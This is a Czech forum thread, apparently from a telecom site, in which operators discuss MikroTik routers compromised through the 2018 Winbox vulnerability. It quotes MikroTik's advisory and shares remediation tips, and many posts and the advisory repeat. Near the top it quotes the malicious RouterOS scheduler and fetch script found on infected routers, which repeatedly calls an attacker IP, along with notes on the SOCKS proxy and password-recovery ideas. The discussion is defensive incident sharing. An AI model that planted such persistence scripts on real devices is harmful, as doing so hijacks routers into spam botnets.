• RouterBoard

  • MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

nezaznamenali jste od 30.7 zvyseny pocet odeslanych emailu od zakazniku?

aktualne pozoruji ze vsichni s Mk maji

/system scheduleradd interval=30s name=schedule3_ on-event=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive start-time=startup/system scriptadd name=script3_ owner=admin policy=ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http"

a ve files: mikrotik.php

ip adresa pouzivaji 95.154.216.164-165-166

bezi to i na MK s 6.40.6, problemy jsem zatim nezaznamenal na MK s 6.40.8, ale je to zatim prvni dojem

tenhle typ 'infekce' jeste povoluje SOCKS server, ktery nastavuje tusim na port 4145. Diky SOCKS muze pak delat cokoliv - tedy i rozesilat maily z IP zakazniku. Zda se, ze je to v posledni dobe nejbeznejsi typ nakazi. Vyznam toho mikrotik.php filu je zrejme jen indikace, ze uz je napadeny

Tak jsem přesně taky tak dopadl. Mikrotik posílal na hotmail Mikrosoftu tisíce emailů denně.

<--- ia0 -->smtp mikrotik.jpg<--- ia0 -->

na nás útočí jak kulomet už delší dobu 185.215.233.x máte to také tak?

Zdvořilý dotaz - proč tam je "x"? Děkuji, mpcz, 2.aug.2018

Zdvořilý dotaz - proč tam je "x"? Děkuji, mpcz, 2.aug.2018

proto, ze ty z te site je tech IP vic.

U nas to vypada, ze z toho Ccka k nam leze jen takove to bezne domaci skenovani (nejcasteji 23, 80 8080)

Dneska mi přišlo do mailu tohle:

Hello,

It has come to our attention that a rogue botnet is currently using a vulnerability in the RouterOS Winbox service, that was patched in RouterOS v6.42.1 in April 23, 2018.

Since all RouterOS devices offer free upgrades with just two clicks, we urge you to upgrade your devices with the "Check for updates" button, if you haven't done so already.

Steps to be taken:

- Upgrade RouterOS to the latest release

- Change your password after upgrading

- Restore your configuration and inspect it for unknown settings

- Implement a good firewall according to the article here:

https://wiki.mikrotik.com/wiki/Manual ... our_Router

All versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable. Is your device affected? If you have open Winbox access to untrusted networks and are running one of the affected versions: yes, you could be affected. Follow advice above. If Winbox is not available to internet, you might be safe, but upgrade still recommended.

More information about the issue can be found here: https://blog.mikrotik.com

Best regards,

MikroTik

Takže tu jasně píšou, že verze vydané v rozmezí 6.29 (28.5.2015) až 6.42 (20.4.2018) jsou zranitelné a že WinBox by se měl povolovat pouze do důvěryhodných sítí.

O SSHčku tam nic nepíší, takže SSH považují za bezpečné a v tom případě, pokud se nechá SSH povolené, dá se skrz něj protunelovat WinBox i z nedůvěryhodné sítě. Jak protunelovat WInBox skrz SSHčko jsem psal tady.

Dneska mi přišlo do mailu tohle:

Hello,

It has come to our attention that a rogue botnet is currently using a vulnerability in the RouterOS Winbox service, that was patched in RouterOS v6.42.1 in April 23, 2018.

Since all RouterOS devices offer free upgrades with just two clicks, we urge you to upgrade your devices with the "Check for updates" button, if you haven't done so already.

Steps to be taken:

- Upgrade RouterOS to the latest release

- Change your password after upgrading

- Restore your configuration and inspect it for unknown settings

- Implement a good firewall according to the article here:

https://wiki.mikrotik.com/wiki/Manual ... our_Router

All versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable. Is your device affected? If you have open Winbox access to untrusted networks and are running one of the affected versions: yes, you could be affected. Follow advice above. If Winbox is not available to internet, you might be safe, but upgrade still recommended.

More information about the issue can be found here: https://blog.mikrotik.com

Best regards,

MikroTik

Takže tu jasně píšou, že verze vydané v rozmezí 6.29 (28.5.2015) až 6.42 (20.4.2018) jsou zranitelné a že WinBox by se měl povolovat pouze do důvěryhodných sítí.

O SSHčku tam nic nepíší, takže SSH považují za bezpečné a v tom případě, pokud se nechá SSH povolené, dá se skrz něj protunelovat WinBox i z nedůvěryhodné sítě. Jak protunelovat WInBox skrz SSHčko jsem psal tady.

Takže s 6.42.1 můžeme být v klidu ? Tu máme skoro všude.

o 20 dní později

Stále nikdo nemá nějaké nové info na jaký login a heslo tento virus mohl údaje MK změnit? Několik napadených/zavirovaných MK už máme na stole, ale všechny pokusy o login i přes mac jsou bez úspěchu... Všechny možné kombinace loginu/hesel neúspěšné.. Tři dny googlování také nepřineslo žádné ovoce.. Všude se o tom píše co to dělá jak se to chová po zavirování, ale login a heslo na který to mohlo změnit nikde není... Přístup z internetu přes který se tato událost stala už máme ošetřený/zakázaný a požadavky o login tam teď skáčou pěkným tempem do dropu... Podařilo se zjistit na které IP tyto infikované stroje dotazují spojení a čekají odpověď. Jsou to IP ze dvou rozsahů, jedna v Rusku druhá Thaiwan. Po zakázání ve firewall hlavního routeru do internetu to tam skáče také pěkným tempem do dropu... Infikované stroje stačí vyresetovat do defaultu, znova nastavit a pak upgrade na MK 6.42.5 a výše, povolit IP-Services na IP z vlastního rozsahu a je klid.. Ale máme tady ještě 79ks do kterých se nedostaneme a je k něm těžký a složitý přístup.... vyresetovat to osobně a znova nastavit by byla akce tak na 4 týdny... Zjištění loginu a hesla po zavirovaní by vše vyřešila.... Nemá někdo z Moravy/Slezka nějaké nástroje jak to zkusit ze zavirovaného stroje zjistit? Vždy se jedná o verzi MK 6.41.3, přivezeme osobně, platíme zlatem :-)

Další postřeh je ten, že po zjištění této nákazy máme aktuálně na wan portu do internetu 3x větší upload než byl kdykoliv jindy za poslední celý rok.... <--- ia0 -->WTF.png<--- ia0 -->

Ty python scripty, co sem dával hapi odkazy jsi zkoušel?

Stále nikdo nemá nějaké nové info na jaký login a heslo tento virus mohl údaje MK změnit? Několik napadených/zavirovaných MK už máme na stole, ale všechny pokusy o login i přes mac jsou bez úspěchu... Všechny možné kombinace loginu/hesel neúspěšné.. Tři dny googlování také nepřineslo žádné ovoce.. Všude se o tom píše co to dělá jak se to chová po zavirování, ale login a heslo na který to mohlo změnit nikde není... Přístup z internetu přes který se tato událost stala už máme ošetřený/zakázaný a požadavky o login tam teď skáčou pěkným tempem do dropu... Podařilo se zjistit na které IP tyto infikované stroje dotazují spojení a čekají odpověď. Jsou to IP ze dvou rozsahů, jedna v Rusku druhá Thaiwan. Po zakázání ve firewall hlavního routeru do internetu to tam skáče také pěkným tempem do dropu... Infikované stroje stačí vyresetovat do defaultu, znova nastavit a pak upgrade na MK 6.42.5 a výše, povolit IP-Services na IP z vlastního rozsahu a je klid.. Ale máme tady ještě 79ks do kterých se nedostaneme a je k něm těžký a složitý přístup.... vyresetovat to osobně a znova nastavit by byla akce tak na 4 týdny... Zjištění loginu a hesla po zavirovaní by vše vyřešila.... Nemá někdo z Moravy/Slezka nějaké nástroje jak to zkusit ze zavirovaného stroje zjistit? Vždy se jedná o verzi MK 6.41.3, přivezeme osobně, platíme zlatem :-)

Další postřeh je ten, že po zjištění této nákazy máme aktuálně na wan portu do internetu 3x větší upload než byl kdykoliv jindy za poslední celý rok.... WTF.png

Už jsem to tu psal, že pokud to není nějaká novinka, heslo zjistím i v bezpečných, posledních verzích. Pošli mi jeden zamklý RB, zkusím to. Za to nic nedáš. Max. stovku za poštu (RB750?). mpcz, 24.8.2018

...

videl jsem na nekterych MT, ze uzivatelum byly definovany site, ze kterych se mohou prihlasit. Takze i kdyz mas heslo, nepripojis se.

Na jedne desce byl jen uzivatel system s povolenym prihlasenim z 23.0.0.0/8...

není nějaká novinka, heslo zjistím i v bezpečných, posledních verzích. Pošli mi jeden zamklý RB, zkusím to. Za to nic nedáš. Max. stovku za poštu (RB750?). mpcz, 24.8.2018

bootujes do OpenWRT a prectes databazi uzivatelu z flashky?

Kdyby to omezovalo ip nezačlo by se to přes winbox připojovat. Ale tady rovnou winbox hodí hlášku - ERROR: wrong username or password

...

videl jsem na nekterych MT, ze uzivatelum byly definovany site, ze kterych se mohou prihlasit. Takze i kdyz mas heslo, nepripojis se.

Na jedne desce byl jen uzivatel system s povolenym prihlasenim z 23.0.0.0/8...

Kdyby to omezovalo ip nezačlo by se to přes winbox připojovat. Ale tady rovnou winbox hodí hlášku - ERROR: wrong username or password

...

videl jsem na nekterych MT, ze uzivatelum byly definovany site, ze kterych se mohou prihlasit. Takze i kdyz mas heslo, nepripojis se.

Na jedne desce byl jen uzivatel system s povolenym prihlasenim z 23.0.0.0/8...

ja mluvil o nastaveni povolenych siti v profilu uzivatele. Nejprve se musi na winbox pripojit a ten pak teprve po zjisteni jmena (a mozna i hesla) rekne, ze uzivatele nechce prave kvuli tomu, ze se nepripojil z povolene site. Jak ta hlaska vypada nevim ale nedivil bych se kdyby byla stejna jako pri spatnem hesle.

RouterOS v6.42.7 na portu 3138 a dnes jsem zjistil že mám "invalid username or password." která ta verze měla být bezpečná ? :-D

RouterOS v6.42.7 na portu 3138 a dnes jsem zjistil že mám "invalid username or password." která ta verze měla být bezpečná ? :-D

Možná blbá reakce, ale vy čekáte že s nějakou verzi se nebude někdo k vam zkoušet připojit pokud nebudete mít nastavený firewall a v ip service a u users povolene jen privátní adresy? :

RouterOS v6.42.7 na portu 3138 a dnes jsem zjistil že mám "invalid username or password." která ta verze měla být bezpečná ? :-D

Spíš bych to tipoval že heslo zůstalo stejné po upgradu. Nebo bude toto heslo společné pro více mikrotiků a z nějakého jiného mikrotiku uniklo...

📡 Telekomunikace.cz